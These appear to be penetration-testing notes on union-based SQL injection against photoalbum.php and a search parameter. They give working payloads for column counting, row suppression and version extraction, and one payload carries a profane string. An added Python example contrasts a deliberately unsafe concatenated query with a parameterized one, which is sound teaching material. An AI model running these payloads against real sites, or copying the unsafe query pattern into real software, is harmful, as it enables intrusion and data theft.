URL enum

#Try:

http://target.com/photoalbum.php?id=1
http://target.com/photoalbum.php?id=1'

# This throws no error
http://target.com/photoalbum.php?id=1 order by 9

# This throws error
http://target.com/photoalbum.php?id=1 order by 10

#Experiment with different parameters

http://example.com/photoalbum.php?id=1 union select 1,2,3,4,5,6,7,8,9

#Also:
#Putting the values in quotes allows you to overwrite content

?search=1 union select "1","2","3","4","5","6","7"
  
#If the query is bad, this is a trick to use:
Use 9999 to override the error

?search=9999

Then you can fire off the query once again

?search=9999 union select "1","2","3","4","5","6","7"


#Overwrite the content of a parameter
?search=9999 union select "1","2","3","FuckYou","5","6","7"

  
#Returning SQL statements (refer to PWK notes | @@version)

?search=9999 union select "1","2","3",(select+@@version),"5","6","7"
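
#Why the probes above behave as they do, and what stops them
Added example, not part of the original notes: the same request values run against a concatenated query and against an allow-listed, parameterized one. It assumes an in-memory SQLite table as a stand-in for the real backend; the table name, column names and function names are constructed for illustration.

```python
import sqlite3

def make_db():
    """Constructed 9-column table, matching the column count found above."""
    db = sqlite3.connect(":memory:")
    cols = ", ".join(f"c{i} TEXT" for i in range(2, 10))
    db.execute(f"CREATE TABLE photoalbum (id INTEGER PRIMARY KEY, {cols})")
    db.execute("INSERT INTO photoalbum VALUES (1,'a','b','c','d','e','f','g','h')")
    return db

def lookup_vulnerable(db, raw_id):
    # Intentionally unsafe: the request value becomes part of the SQL text,
    # so ORDER BY / UNION inside the value are parsed as SQL keywords.
    return db.execute("SELECT * FROM photoalbum WHERE id = " + raw_id).fetchall()

def lookup_hardened(db, raw_id):
    # 1) Allow-list: an album id is ASCII digits only.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be an integer")
    # 2) Bound parameter: the value is passed as data, never parsed as SQL.
    return db.execute("SELECT * FROM photoalbum WHERE id = ?", (int(raw_id),)).fetchall()

def probe(lookup, raw_id):
    """Return ('rows', n), ('sql_error', msg) or ('rejected', msg)."""
    db = make_db()
    try:
        return ("rows", len(lookup(db, raw_id)))
    except sqlite3.Error as exc:
        return ("sql_error", str(exc))
    except (ValueError, OverflowError) as exc:
        return ("rejected", str(exc))

# Request values taken from the notes above.
SAMPLES = ["1", "1'", "1 order by 9", "1 order by 10",
           "1 union select 1,2,3,4,5,6,7,8,9",
           "9999 union select 1,2,3,4,5,6,7,8,9"]

if __name__ == "__main__":
    for value in SAMPLES:
        print(f"{value!r:45} vulnerable={probe(lookup_vulnerable, value)[0]:10} "
              f"hardened={probe(lookup_hardened, value)[0]}")
```

In the vulnerable path the 9999 value matches no stored row, so the only row returned is the one supplied by the UNION; in the hardened path every value except a plain integer is rejected before any SQL runs.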
